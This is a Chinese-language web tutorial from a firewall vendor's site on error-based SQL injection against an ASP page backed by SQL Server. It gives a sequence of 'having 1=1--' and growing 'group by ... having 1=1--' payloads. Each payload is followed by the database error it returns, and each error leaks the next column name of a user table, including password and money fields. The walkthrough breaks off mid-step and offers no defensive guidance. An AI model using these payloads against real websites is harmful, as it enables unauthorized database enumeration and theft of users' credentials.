关于冰盾 | 使用条款 | 网站地图
 
SQL构造语句暴字段
SQL构造语句暴字段
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-12-07
 

一、获得建立用户的表的名字和字段的名字;使用select语法的having子句。
**********************************************************************************
having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_id 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。 
/football/reguser/check.asp,行26
成果:知道了表的名字reguser和第一个字段的名字reguser.reg_id。

二、通过字段放到group by子句找到字段名。
1、
**********************************************************************************
group by reguser.reg_id having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_name 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_name字段
2、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_password 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_password字段
3、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_relname 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_relname字段
4、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_regtime 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_regtime字段
5、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_findme 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_findme字段
6、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,reguser.reg_findme having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_city 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26
成果:得到了reguser.reg_city字段
7、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_qq 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26
成果:得到了reguser.reg_qq字段
8、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city,reguser.reg_qq having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_icq 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_icq字段
9、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_msn 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_msn字段
10、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_phone 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26
成果:得到了reguser.reg_phone字段
11、 
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_class 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26 
成果:得到了reguser.reg_class字段
12、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,reguser.reg_class having 1=1--
**********************************************************************************
返回结果:
Microsoft OLE DB Provider for SQL Server 错误 80040e14 
列 reguser.reg_money 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/football/reguser/check.asp,行26
成果:得到了reguser.reg_money字段
13、
**********************************************************************************
group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime,

reguser.reg_findme,reguser.reg_city,reguser.reg_qq,reguser.reg_icq,reguser.reg_msn,reguser.reg_phone,

reguser.reg_class,reguser.reg_money having 1=1--
****************************
 
 
最新内容:
PHP168后台查看/修改任意文件漏洞[2014-12-07]
关于网站的SYN_RECV攻击的防范措施[2014-12-07]
电信IP网 防范黑客攻击策略详细分析[2014-12-07]
TCP三次握手/四次挥手[2014-12-07]
简单防范SYN_RECV攻击[2014-12-07]
SYN 攻击原理以及防范技术[2014-12-07]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195